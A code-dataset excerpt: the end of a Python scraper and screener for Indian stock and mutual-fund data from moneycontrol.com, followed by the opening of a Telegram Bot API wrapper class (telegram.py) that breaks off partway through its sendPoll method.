consolidated_html_data_content = page_content.find('div', attrs={'id': 'mktdet_2'})
consolidated_petable = get_table(get_children(consolidated_html_data_content)[0])
consolidated_pbtable = get_table(get_children(consolidated_html_data_content)[1])
consolidated_data_table = list()
consolidated_data_table.extend(consolidated_petable)
consolidated_data_table.extend(consolidated_pbtable)
for row in consolidated_data_table:
k = row[0]['text']
if len(row) < 2:
v = None
else:
v = row[1]['text'].split(" ")[0].replace(',', '')
key_val_pairs[k] = v
for row in data_table:
k = row[0]['text']
if len(row) < 2:
v = None
else:
v = row[1]['text'].split(" ")[0].replace(',', '')
if k not in key_val_pairs or not isfloat(key_val_pairs[k]):
key_val_pairs[k] = v
key_val_pairs["pe"] = ffloat(key_val_pairs.pop('P/E'))
key_val_pairs["book_value"] = ffloat(key_val_pairs.pop('BOOK VALUE (Rs)'))
key_val_pairs["deliverables"] = ffloat(key_val_pairs.pop('DELIVERABLES (%)'))
key_val_pairs["eps"] = ffloat(key_val_pairs.pop('EPS (TTM)'))
key_val_pairs["industry_pe"] = ffloat(key_val_pairs.pop('INDUSTRY P/E'))
if 'MARKET CAP (Rs Cr)' in key_val_pairs:
key_val_pairs["market_cap"] = key_val_pairs.pop('MARKET CAP (Rs Cr)')
elif '**MARKET CAP (Rs Cr)' in key_val_pairs:
key_val_pairs["market_cap"] = key_val_pairs.pop('**MARKET CAP (Rs Cr)')
key_val_pairs["market_cap"] = ffloat(key_val_pairs["market_cap"])
key_val_pairs["pb"] = ffloat(key_val_pairs.pop('PRICE/BOOK'))
key_val_pairs["pc"] = ffloat(key_val_pairs.pop('P/C'))
key_val_pairs['price'] = ffloat(price)
key_val_pairs['today_change_value'] = today_change_value
key_val_pairs['today_change_percent'] = today_change_percent
key_val_pairs['low'] = low
key_val_pairs['high'] = high
key_val_pairs['open'] = open_price
key_val_pairs['volume'] = volume
key_val_pairs["name"] = name
key_val_pairs["scrip_name"] = scrip_name
key_val_pairs["yearly_low"] = ffloat(yearly_low)
key_val_pairs["yearly_high"] = ffloat(yearly_high)
key_val_pairs["min_csg"] = min_csg
key_val_pairs["three_year_csg"] = three_year_csg
key_val_pairs["min_cpg"] = min_cpg
key_val_pairs["three_year_cpg"] = three_year_cpg
key_val_pairs["min_roe"] = min_roe
key_val_pairs["three_year_roe"] = three_year_roe
key_val_pairs["peg"] = ffloat(key_val_pairs["pe"]) / three_year_cpg
if np.isnan(three_year_cpg):
key_val_pairs["peg"] = ffloat(key_val_pairs["pe"]) / min_cpg
key_val_pairs["min_recovery_year"] = get_year_when_cumulative_profit_over_pe(ffloat(key_val_pairs["pe"]),
three_year_cpg)
key_val_pairs['sector'] = sector
key_val_pairs['thirty_dma'] = ffloat(thirty_dma)
key_val_pairs['fifty_dma'] = ffloat(fifty_dma)
key_val_pairs['one_fifty_dma'] = ffloat(one_fifty_dma)
key_val_pairs['two_hundred_dma'] = ffloat(two_hundred_dma)
key_val_pairs['l_yp'] = l_yp
key_val_pairs['two_yp'] = two_yp
key_val_pairs['three_yp'] = three_yp
key_val_pairs['five_yp'] = five_yp
key_val_pairs['gain_loss_l_yp'] = gain_loss_l_yp
key_val_pairs['gain_loss_two_yp'] = gain_loss_two_yp
key_val_pairs['gain_loss_three_yp'] = gain_loss_three_yp
key_val_pairs['gain_loss_five_yp'] = gain_loss_five_yp
key_val_pairs['de'] = np.nan
key_val_pairs['ev_by_ebitda'] = np.nan
if "ratios_ev_by_ebitda" in key_val_pairs and len(key_val_pairs["ratios_ev_by_ebitda"]) > 0:
key_val_pairs['ev_by_ebitda'] = key_val_pairs["ratios_ev_by_ebitda"][0]
if "ratios_de" in key_val_pairs and len(key_val_pairs["ratios_de"]) > 0:
key_val_pairs['de'] = key_val_pairs["ratios_de"][0]
key_val_pairs['quarterly_results'] = quarterly_results
key_val_pairs['annual_results'] = annual_results
key_val_pairs['balance_sheet'] = balance_sheet
key_val_pairs['cash_flows'] = cash_flows
key_val_pairs['past_prices'] = past_prices
key_val_pairs['failure'] = False
del key_val_pairs['DIV (%)']
del key_val_pairs['DIV YIELD.(%)']
del key_val_pairs['FACE VALUE (Rs)']
del key_val_pairs['Market Lot']
except Exception as e:
# raise e
traceback.print_exc()
key_val_pairs['failure'] = True
key_val_pairs['err'] = "Error for: %s" % original_url
print(key_val_pairs['err'])
return key_val_pairs
return key_val_pairs
def get_scrip_info_by_nse_name(nse_name):
url = "https://www.moneycontrol.com/mccode/common/autosuggesion.php?classic=true&query=%s&type=1&format=json"%nse_name
page_response = requests.get(url, timeout=240)
json_text = page_response.text
data = json.loads(json_text)
if len(data)>1:
scrips = pd.DataFrame.from_records(data)["pdt_dis_nm"].values
idx = list(map(lambda x:BeautifulSoup(x, "html.parser").find("span").text.split(",")[1].strip(),scrips)).index(nse_name)
scrip_url = data[idx]['link_src']
else:
scrip_url = data[0]['link_src']
return get_scrip_info(scrip_url)
def get_all_company_from_mf(mfid,threadpool_size=8):
portfolio_table,fund_name = get_portfolio(mfid = mfid)
table_data = get_table(portfolio_table)[1:]
scrip_col = 0
links = list(map(lambda x:x[scrip_col]['href'],table_data))
pool = ThreadPool(threadpool_size)
scrip_details = pool.map(get_scrip_info, links)
scrip_details = list(filter(lambda x:x is not None,scrip_details))
length1 = len(scrip_details)
failed = list(filter(lambda x:x['failure'],scrip_details))
scrip_details = list(filter(lambda x:not x['failure'],scrip_details))
length2 = len(scrip_details)
print("Scrips which failed to fetch = %s"%(length1-length2))
print(failed)
scrip_details = {scrip['scrip_name']:scrip for scrip in scrip_details}
return scrip_details
def get_pe_filter(params={"mcap": [1e2, 1e3, 5e3, 1e4, 2e4], "pe": [1, 5, 10, 15, 20], "mcap_lower_limit": 1e2,
"pe_upper_limit": 25}):
def filter_fn(stock_detail):
x = params['mcap']
y = params['pe']
pe = ffloat(stock_detail['pe'])
mcap = ffloat(stock_detail['market_cap'])
if np.isnan(pe) or np.isnan(mcap):
return False
if pe > params['pe_upper_limit']:
return False
if mcap < params['mcap_lower_limit']:
return False
right = np.searchsorted(params['mcap'], mcap)
if right == 0:
right = right + 1
if right == len(x):
right = right - 1
left = right - 1
coefficients = np.polyfit([x[left], x[right]], [y[left], y[right]], 1)
polynomial = np.poly1d(coefficients)
pe_value = polynomial(mcap)
if pe <= pe_value:
return True
return False
return filter_fn
def get_pb_filter(params={"mcap": [1e2, 5e2, 1e3, 2e3, 6e3], "pb": [1, 2, 3, 4, 5], "pb_upper_limit": 5}):
def filter_fn(stock_detail):
x = params['mcap']
y = params['pb']
pb = ffloat(stock_detail['pb'])
bv = ffloat(stock_detail['book_value'])
mcap = ffloat(stock_detail['market_cap'])
if np.isnan(pb) or np.isnan(bv) or pb > params['pb_upper_limit'] or bv < 0:
return False
if pb > params['pb_upper_limit']:
return False
right = np.searchsorted(params['mcap'], mcap)
if right == 0:
right = right + 1
if right == len(x):
right = right - 1
left = right - 1
coefficients = np.polyfit([x[left], x[right]], [y[left], y[right]], 1)
polynomial = np.poly1d(coefficients)
pb_value = polynomial(mcap)
if pb <= pb_value:
return True
return False
return filter_fn
def get_profitability_filter(params={"peg_lower_limit": 0, "peg_upper_limit": 3,
"min_recovery_year": 15, "min_cpg_lower_limit": 0}):
def filter_fn(stock_detail):
peg = ffloat(stock_detail['peg'])
min_cpg = ffloat(stock_detail['min_cpg'])
min_recovery_year = ffloat(stock_detail['min_recovery_year'])
if np.isnan(peg) or np.isnan(min_cpg) or np.isnan(min_recovery_year):
return False
if peg <= params['peg_upper_limit'] and peg >= params['peg_lower_limit'] and min_recovery_year <= params[
'min_recovery_year'] and min_cpg > params['min_cpg_lower_limit']:
return True
return False
return filter_fn
def get_generic_filter(param_name, lower_limit=None, upper_limit=None,
replacement_nan=None, replacement_not_present=None):
def filter_fn(stock_detail):
param = replacement_not_present
if param_name in stock_detail:
param = ffloat(stock_detail[param_name])
if np.isnan(param):
param = replacement_nan
if param is None or np.isnan(param):
return False
if param <= upper_limit and param >= lower_limit:
return True
return False
return filter_fn
def get_generic_filter_two_variables(x, y, xvar_name, yvar_name, accept_lower=True,
pass_not_found=False):
def filter_fn(stock_detail):
if x is None or y is None or xvar_name is None or yvar_name is None:
raise ValueError("Incorrect Parameters")
if xvar_name not in stock_detail or yvar_name not in stock_detail:
return pass_not_found
xval = stock_detail[xvar_name]
yval = stock_detail[yvar_name]
right = np.searchsorted(xvar, xval)
if right == 0:
right = right + 1
if right == len(x):
right = right - 1
left = right - 1
coefficients = np.polyfit([x[left], x[right]], [y[left], y[right]], 1)
polynomial = np.poly1d(coefficients)
yt_value = polynomial(xval)
if yval <= yt_value == accept_lower:
return True
return False
return filter_fn
def get_stock_urls_from_listing_page(listing_page):
page_response = requests.get(listing_page, timeout=240)
page_content = BeautifulSoup(page_response.content, "html.parser")
urls_table = page_content.find('table',attrs={'class':'pcq_tbl'})
links = list(map(lambda x:get_children(x)[0]['href'],urls_table.find_all('td')))
return links
def get_all_links(threadpool_size=8):
abc = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
letters = [letter for letter in abc]
listing_page_urls = ['https://www.moneycontrol.com/india/stockpricequote/'+letter for letter in letters]
pool = ThreadPool(threadpool_size)
all_links = list(more_itertools.flatten(pool.map(get_stock_urls_from_listing_page, listing_page_urls)))
return all_links
def get_all_company_details(accumulator={}, failures=[], size=10000, start=None, end=None,
threadpool_size=8, ignore_failures=True,
ignore_success=True, randomize=False):
# filters is a list of functions returning T/F, They are always
batch_size = 5 * threadpool_size
all_links = list(set(get_all_links()))
print("Total Number of links = %s" % (len(all_links)))
if ignore_success:
all_links = list(set(all_links) - set([scrip['original_url'] for scrip in accumulator.values()]))
if ignore_failures:
all_links = list(set(all_links) - set([scrip['original_url'] for scrip in failures]))
print("Total Links after removing success and failures = %s" % (len(all_links)))
all_links = sorted(all_links)
if start is not None and end is not None:
all_links = all_links[start:end]
all_links = all_links[:size]
if randomize:
shuffle(all_links)
print("Total Links To Process = %s" % (len(all_links)))
pool = ThreadPool(threadpool_size)
batches = int(np.ceil(len(all_links) / batch_size))
for batch_num in range(batches):
start = batch_num * batch_size
end = min((batch_num + 1) * batch_size, len(all_links))
print("start = %s, end = %s" % (start, end))
this_batch = all_links[start:end]
scrip_details = pool.map(get_scrip_info, this_batch)
scrip_details = list(filter(lambda x: x is not None, scrip_details))
fails = list(filter(lambda x: x['failure'], scrip_details))
scrip_details = list(filter(lambda x: not x['failure'], scrip_details))
for scrip in scrip_details:
accumulator[scrip['scrip_name']] = scrip
failures.extend(fails)
failures = {failure['original_url']: failure for failure in failures}
failures = list(failures.values())
def filter_companies(all_scrips, filters=[]):
scrip_details = list(all_scrips.values())
for i in range(len(filters)):
scrip_details = list(filter(filters[i], scrip_details))
return scrip_details
def get_df_from_scrip_details(scrip_details):
other_cols = ['name', 'scrip_name']
numeric_cols = ['book_value', 'price', 'deliverables', 'eps', 'industry_pe',
'market_cap', 'pb', 'pc', 'pe', 'de',
'yearly_high', 'yearly_low', 'min_csg', 'three_year_csg', 'min_cpg', 'three_year_cpg',
'min_roe', 'three_year_roe', 'peg', 'min_recovery_year',
'l_yp', 'two_yp', 'three_yp', 'five_yp', 'gain_loss_l_yp', 'gain_loss_two_yp',
'gain_loss_three_yp']
all_cols = other_cols + numeric_cols
scrip_details = [{your_key: scrip[your_key] for your_key in all_cols} for scrip in scrip_details]
scrip_details = pd.DataFrame.from_records(scrip_details)
scrip_details[numeric_cols] = scrip_details[numeric_cols].applymap(ffloat)
scrip_details = scrip_details[all_cols]
return scrip_details
def score_company_on_filters(all_scrips, filters={}):
all_scrips = list(all_scrips.values())
other_cols = ['name', 'scrip_name']
numeric_cols = ['price', 'industry_pe',
'market_cap', 'pb', 'pe', 'de',
'yearly_high', 'yearly_low', 'three_year_csg', 'three_year_cpg',
'peg', 'min_recovery_year',
'l_yp', 'three_yp', 'five_yp']
all_cols = other_cols + list(filters.keys()) + numeric_cols
scrip_details = []
for scrip in all_scrips:
for key in filters.keys():
scrip[key] = filters[key](scrip)
scrip_detail = {your_key: scrip[your_key] for your_key in all_cols}
scrip_details.append(scrip_detail)
scrip_details = pd.DataFrame.from_records(scrip_details)
scrip_details[numeric_cols] = scrip_details[numeric_cols].applymap(ffloat)
scrip_details = scrip_details[all_cols]
return scrip_details
def generate_price_chart(stock_df, name, days=1095, ewmas=[], other_technical_indicators=[]):
plt.figure(figsize=(16, 8))
ts_df = stock_df.tail(days)
handles = []
p1, = plt.plot(ts_df.index, ts_df['close'], label="price")
handles.append(p1)
for ewma in ewmas:
y = ts_df['close'].ewm(span=ewma).mean()
p2, = plt.plot(ts_df.index, y, label="%s day ewma" % ewma)
handles.append(p2)
plt.legend(handles=handles)
plt.title(name)
plt.ylabel('Closing Price')
plt.show()
def generate_price_volume_chart(stock_df, name, days=1095, ewmas=[], other_technical_indicators=[]):
plt.figure(figsize=(16, 8))
top = plt.subplot2grid((6, 6), (0, 0), rowspan=4, colspan=6)
bottom = plt.subplot2grid((6, 6), (4, 0), rowspan=2, colspan=6)
ts_df = stock_df.tail(days)
handles = []
p1, = top.plot(ts_df.index, ts_df['close'], label="price")
handles.append(p1)
for ewma in ewmas:
y = ts_df['close'].ewm(span=ewma).mean()
p2, = top.plot(ts_df.index, y, label="%s day ewma" % ewma)
handles.append(p2)
top.legend(handles=handles)
bottom.bar(ts_df.index, ts_df['volume'])
bottom.set_ylim([ts_df['volume'].min(), ts_df['volume'].max()])
# sns.lineplot(x="index", y="close", data=ts_df.reset_index(),ax=top)
# sns.barplot(x="index", y="volume", data=ts_df.reset_index(),ax=bottom)
# set the labels
top.axes.get_xaxis().set_visible(False)
top.set_title(name)
top.set_ylabel('Closing Price')
bottom.set_ylabel('Volume')
plt.show()
def generate_returns_chart(stocks, days=1095):
plt.figure(figsize=(16, 8))
stocks = {key: stocks[key].tail(days).apply(lambda x: x / x[0]) for key in stocks.keys()}
handles = []
for key in stocks.keys():
y = stocks[key]['close']
p2, = plt.plot(stocks[key].index, y, label=key)
handles.append(p2)
plt.legend(handles=handles)
plt.title("Comparative returns")
plt.ylabel('Comparative Returns')
plt.show()
def generate_rolling_returns_chart(stocks, days=1095, rolling=252):
plt.figure(figsize=(16, 8))
stocks = {key: stocks[key][['close']] for key in stocks.keys()}
# Only take intersection of all indexes (dates) else rolling calculation will be screwed up
indexes = None
for key in stocks.keys():
stock = stocks[key].tail(days + rolling)
if indexes is None:
indexes = set(stock.index)
else:
indexes = indexes.intersection(set(stock.index))
for key in stocks.keys():
stock = stocks[key]
stock = stock[stock.index.isin(indexes)]
stocks[key] = stock
for df in stocks.values():
df[["close"]] = df[["close"]].rolling(rolling).agg({"close": lambda x: (x[-1] - x[0]) * 100 / x[0]})
stocks = {key: stocks[key].tail(days)[['close']] for key in stocks.keys()}
handles = []
for key in stocks.keys():
y = stocks[key]['close']
p2, = plt.plot(stocks[key].index, y, label=key)
handles.append(p2)
plt.legend(handles=handles)
plt.title("Rolling returns")
plt.ylabel('Rolling Returns')
plt.show()
for key in stocks.keys():
stocks[key]['name'] = key
all_stocks = pd.concat(list(stocks.values()))
fig, ax = plt.subplots(figsize=(16, 8))
sns.boxplot(x="name", y="close", data=all_stocks, ax=ax);
ax.xaxis.set_tick_params(rotation=90)
plt.title("Rolling Returns variation")
plt.show()
def generate_percent_change_chart(stocks,days=1095):
plt.figure(figsize=(16,8))
stocks = {key:stocks[key].tail(days).pct_change()*100 for key in stocks.keys()}
handles = []
for key in stocks.keys():
stocks[key]['name'] = key
y = stocks[key]['close']
p2, = plt.plot(stocks[key].index, y,label=key)
handles.append(p2)
all_stocks = pd.concat(list(stocks.values()))
plt.legend(handles=handles)
plt.title("Daily Percent Changes Chart")
plt.ylabel('Daily Percent Changes')
plt.show()
fig, ax = plt.subplots(figsize=(16,8))
sns.boxplot(x="name", y="close", data=all_stocks,ax=ax);
ax.xaxis.set_tick_params(rotation=90)
plt.show()
def get_all_details_for_mf(scrip_links_table, percent_col=4, scrip_col=0, threadpool_size=8):
percent_col = 4
scrip_col = 0
qty_col = 2
total_value_crores_col = 3
def scrip_detail_collector(row):
scrip_url = row[scrip_col]['href']
scrip_detail = get_scrip_info(scrip_url)
try:
scrip_detail['percent'] = row[percent_col]['text']
scrip_detail['name'] = row[scrip_col]['text']
scrip_detail['qty'] = row[qty_col]['text']
scrip_detail['total_value_crores'] = row[total_value_crores_col]['text']
except Exception as e:
print(scrip_url)
return scrip_detail
pool = ThreadPool(threadpool_size)
scrip_details = pool.map(scrip_detail_collector, scrip_links_table)
scrip_details = list(filter(lambda x: x is not None, scrip_details))
length1 = len(scrip_details)
scrip_details = list(filter(lambda x: not x['failure'], scrip_details))
length2 = len(scrip_details)
print("Scrips which failed to fetch = %s" % (length1 - length2))
scrip_details = pd.DataFrame.from_records(scrip_details)
numeric_cols = ['book_value', 'price', 'deliverables', 'eps', 'industry_pe',
'market_cap', 'pb', 'pc', 'pe', 'percent', 'qty', 'total_value_crores',
'yearly_high', 'yearly_low', 'min_csg', 'three_year_csg', 'min_cpg', 'three_year_cpg',
'min_roe', 'three_year_roe', 'peg', 'min_recovery_year']
scrip_details[numeric_cols] = scrip_details[numeric_cols].applymap(ffloat)
return scrip_details
def fund_returns_analysis(fund_list, benchmark_index_prices={}, days=1095,rolling=252):
fund_prices = {}
for fund in fund_list:
portfolio_table, fund_name = get_portfolio(mfid=fund)
prices_df = pd.read_csv("https://www.moneycontrol.com/mf/mf_info/mf_graph.php?im_id=%s" % fund, header=None,
names=['open', 'high', 'low', 'close', 'volume'])[
['open', 'high', 'low', 'close', 'volume']]
prices_df.index = pd.to_datetime(prices_df.index)
fund_prices[fund_name] = prices_df
generate_returns_chart({**fund_prices, **benchmark_index_prices}, days=days)
generate_percent_change_chart({**fund_prices, **benchmark_index_prices}, days=days)
generate_rolling_returns_chart({**fund_prices, **benchmark_index_prices}, days=days,rolling=rolling)
def comparative_analysis(fund_list,threadpool_size=8):
fund_details = list()
for fund in fund_list:
portfolio_table,fund_name = get_portfolio(mfid = fund)
table_data = get_table(portfolio_table)
scrip_details = get_all_details_for_mf(table_data[1:],threadpool_size=threadpool_size)
pe = np.dot(scrip_details['price'].fillna(0),scrip_details['percent'])/np.dot(scrip_details['eps'].fillna(0),scrip_details['percent'])
three_year_cpg = np.dot(scrip_details['three_year_cpg'].fillna(0),scrip_details['percent']/100)
peg = pe/three_year_cpg
pb = np.dot(scrip_details['price'].fillna(0),scrip_details['percent'])/np.dot(scrip_details['book_value'].fillna(0),scrip_details['percent'])
aum = np.sum(scrip_details['total_value_crores'])
avg_market_cap = np.dot(scrip_details['market_cap'].fillna(0),scrip_details['percent']/100)
min_recovery_year = get_year_when_cumulative_profit_over_pe(pe,three_year_cpg)
prices_df = pd.read_csv("https://www.moneycontrol.com/mf/mf_info/mf_graph.php?im_id=%s"%fund,header=None,names=['open','high','low','close','volume'])[['open','high','low','close','volume']]
prices_df.index = pd.to_datetime(prices_df.index)
fund_detail = {"name":fund_name,"pe":pe,"peg":peg,"pb":pb,"aum":aum,"avg_market_cap":avg_market_cap,"three_year_cpg":three_year_cpg,"min_recovery_year":min_recovery_year,"past_prices":prices_df}
fund_details.append(fund_detail)
return pd.DataFrame.from_records(fund_details)
| 45,261 | 0 | 920 |
4b9f3f3d538708150e0c79b7764ca9adeb55b1c1 | 16,982 | py | Python | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | 3 | 2022-03-18T08:00:40.000Z | 2022-03-24T15:16:51.000Z | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | null | null | null | pyTelegramClient/telegram.py | Arjun-M/pyTelegramClient | d6fe2bfaf2f4a5c36c997589d0b4d64b428cd603 | [
"MIT"
] | null | null | null | import json , requests , asyncio , logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
| 50.391691 | 408 | 0.664822 | import json , requests , asyncio , logging
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
class Telegram:
def __init__(self, client ):
self.client = client
def sendMessage(self , chat_id , text, disable_web_page_preview=None, reply_to_message_id=None, reply_markup=None, parse_mode=None, disable_notification=None, entities=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': str(chat_id), 'text': text}
if disable_web_page_preview is not None:
payload['disable_web_page_preview'] = disable_web_page_preview
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if parse_mode:
payload['parse_mode'] = parse_mode
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if entities:
payload['entities'] = entities
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("sendMessage" , payload )
def deleteWebhook(self , drop_pending_updates=None ):
payload = {}
if drop_pending_updates is not None:
payload['drop_pending_updates'] = drop_pending_updates
return self.client.callApi("deleteWebhook" , payload )
def getWebhookInfo(self):
return self.client.callApi("getWebhookInfo" , {} )
def getUpdates(self , offset=None, limit=None, allowed_updates=None ):
payload = {}
if offset:
payload['offset'] = offset
if limit:
payload['limit'] = limit
if allowed_updates is not None:
payload['allowed_updates'] = allowed_updates
return self.client.callApi("getUpdates" , payload )
def getUserProfilePhotos(token, user_id, offset=None, limit=None):
payload = {'user_id': user_id}
if offset:
payload['offset'] = offset
if limit:
payload['limit'] = limit
return self.client.callApi("getUserProfilePhotos" , {} )
def getChat(self , chat_id):
payload = {"chat_id":chat_id}
return self.client.callApi("getChat" , payload )
def getMe(self):
return self.client.callApi("getMe" , {} )
def logOut(self):
return self.client.callApi("logOut" , {} )
def close(self):
return self.client.callApi("close" , {} )
def getFile(self , file_id):
payload = {"file_id":file_id}
return self.client.callApi("getChat" , payload )
def setWebhook(self , url , certificate=None, max_connections=None, allowed_updates=None, ip_address=None, drop_pending_updates = None):
payload = { 'url': url }
files = None # set default .
if certificate:
files = {'certificate': certificate}
if max_connections:
payload['max_connections'] = max_connections
if allowed_updates is not None:
payload['allowed_updates'] = allowed_updates
if ip_address is not None:
payload['ip_address'] = ip_address
if drop_pending_updates is not None:
payload['drop_pending_updates'] = drop_pending_updates
return self.client.callApi("setWebhook" , payload, files=files)
def forwardMessage(self , chat_id, from_chat_id, message_id, disable_notification=None, protect_content=None):
payload = {'chat_id': chat_id, 'from_chat_id': from_chat_id, 'message_id': message_id}
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("forwardMessage", payload)
def copyMessage(self , chat_id, from_chat_id, message_id, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, reply_to_message_id=None, allow_sending_without_reply=None, reply_markup=None, protect_content=None):
payload = {'chat_id': chat_id, 'from_chat_id': from_chat_id, 'message_id': message_id}
if caption is not None:
payload['caption'] = caption
if parse_mode:
payload['parse_mode'] = parse_mode
if caption_entities is not None:
payload['caption_entities'] = caption_entities
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup is not None:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi("copyMessage" , payload)
def sendDice( self, chat_id, emoji=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id}
if emoji:
payload['emoji'] = emoji
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendDice" , payload)
def sendPhoto( self, chat_id, photo, caption=None, reply_to_message_id=None, reply_markup=None, parse_mode=None, disable_notification=None, caption_entities=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id}
files = None # set default .
if isinstance(photo, str):
if photo.startswith("./"):
files = {'photo': open(photo, "rb")}
else:
payload['photo'] = photo
else:
files = {'photo': photo}
if caption:
payload['caption'] = caption
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if parse_mode:
payload['parse_mode'] = parse_mode
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if caption_entities:
payload['caption_entities'] = caption_entities
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendPhoto" , payload, files=files )
def sendLocation (self , chat_id, latitude, longitude, live_period=None, reply_to_message_id=None, reply_markup=None, disable_notification=None, horizontal_accuracy=None, heading=None, proximity_alert_radius=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id, 'latitude': latitude, 'longitude': longitude}
if live_period:
payload['live_period'] = live_period
if horizontal_accuracy:
payload['horizontal_accuracy'] = horizontal_accuracy
if heading:
payload['heading'] = heading
if proximity_alert_radius:
payload['proximity_alert_radius'] = proximity_alert_radius
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if reply_markup:
payload['reply_markup'] = reply_markup
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendLocation" , payload )
def stopMessageLiveLocation(self , chat_id=None, message_id=None, inline_message_id=None, reply_markup=None):
payload = {}
if chat_id:
payload['chat_id'] = chat_id
if message_id:
payload['message_id'] = message_id
if inline_message_id:
payload['inline_message_id'] = inline_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
return self.client.callApi( "stopMessageLiveLocation" , payload )
def editMessageLiveLocation( self , latitude, longitude, chat_id=None, message_id=None, inline_message_id=None, reply_markup=None, horizontal_accuracy=None, heading=None, proximity_alert_radius=None):
payload = {'latitude': latitude, 'longitude': longitude}
if chat_id:
payload['chat_id'] = chat_id
if message_id:
payload['message_id'] = message_id
if horizontal_accuracy:
payload['horizontal_accuracy'] = horizontal_accuracy
if heading:
payload['heading'] = heading
if proximity_alert_radius:
payload['proximity_alert_radius'] = proximity_alert_radius
if inline_message_id:
payload['inline_message_id'] = inline_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
return self.client.callApi( "editMessageLiveLocation" , payload )
def sendContact(self , chat_id, phone_number, first_name, last_name=None, vcard=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id, 'phone_number': phone_number, 'first_name': first_name}
if last_name:
payload['last_name'] = last_name
if vcard:
payload['vcard'] = vcard
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendContact" , payload )
def sendChatAction(self , chat_id, action):
payload = {'chat_id': chat_id, 'action': action}
return self.client.callApi( "sendChatAction" , payload )
def sendMediaGroup(self , chat_id, media, disable_notification=None, reply_to_message_id=None, allow_sending_without_reply=None, protect_content=None):
payload = {'chat_id': chat_id, 'media': media }
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendMediaGroup" , payload )
def sendVenue(self , chat_id, latitude, longitude, title, address, foursquare_id=None, foursquare_type=None, disable_notification=None, reply_to_message_id=None, reply_markup=None, allow_sending_without_reply=None, google_place_id=None, google_place_type=None, protect_content=None):
payload = {'chat_id': chat_id, 'latitude': latitude, 'longitude': longitude, 'title': title, 'address': address}
if foursquare_id:
payload['foursquare_id'] = foursquare_id
if foursquare_type:
payload['foursquare_type'] = foursquare_type
if disable_notification is not None:
payload['disable_notification'] = disable_notification
if reply_to_message_id:
payload['reply_to_message_id'] = reply_to_message_id
if reply_markup:
payload['reply_markup'] = reply_markup
if allow_sending_without_reply is not None:
payload['allow_sending_without_reply'] = allow_sending_without_reply
if google_place_id:
payload['google_place_id'] = google_place_id
if google_place_type:
payload['google_place_type'] = google_place_type
if protect_content is not None:
payload['protect_content'] = protect_content
return self.client.callApi( "sendVenue" , payload )
def sendPoll( self , chat_id, question, options,is_anonymous = None, type = None, allows_multiple_answers = None, correct_option_id = None, explanation = None, explanation_parse_mode=None, open_period = None, close_date = None, is_closed = None, disable_notification=False, reply_to_message_id=None, allow_sending_without_reply=None, reply_markup=None, explanation_entities=None, protect_content=None):
payload = { 'chat_id': str(chat_id), 'question': question, 'options': options }
if is_anonymous is not None:
payload['is_anonymous'] = is_anonymous
if type is not None:
payload['type'] = type
if allows_multiple_answers is not None:
payload['allows_multiple_answers'] = allows_multiple_answers
if correct_option_id is not None:
payload['correct_option_id'] = correct_option_id
if explanation is not None:
payload['explanation'] = explanation
if explanation_parse_mode is not None:
payload['explanation_parse_mode'] = explanation_parse_mode
if open_period is not None:
payload['open_period'] = open_period
if close_date is not None:
payload['close_date'] = close_date
if is_closed is not None:
payload['is_closed'] = is_closed
if disable_notification:
payload['disable_notification'] = disable_notification
if reply_to_message_id is not None:
payload['reply_to_message_id'] = reply_to_message_id
